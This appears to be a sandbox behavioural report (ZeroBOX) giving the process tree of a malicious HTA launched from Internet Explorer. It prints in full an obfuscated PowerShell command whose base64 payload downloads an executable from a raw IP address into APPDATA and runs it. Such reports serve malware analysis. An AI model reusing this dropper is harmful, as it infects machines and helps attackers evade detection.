| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\niceworkingskilldevelopedwithgreatnews.hta.html
2616
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2616 CREDAT:145409
  2704
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
    2928
    - powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
      2988
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\4me71g_z.cmdline"
        2316
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESAF18.tmp" "c:\Users\test22\AppData\Local\Temp\CSCAE9A.tmp"
        2460

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents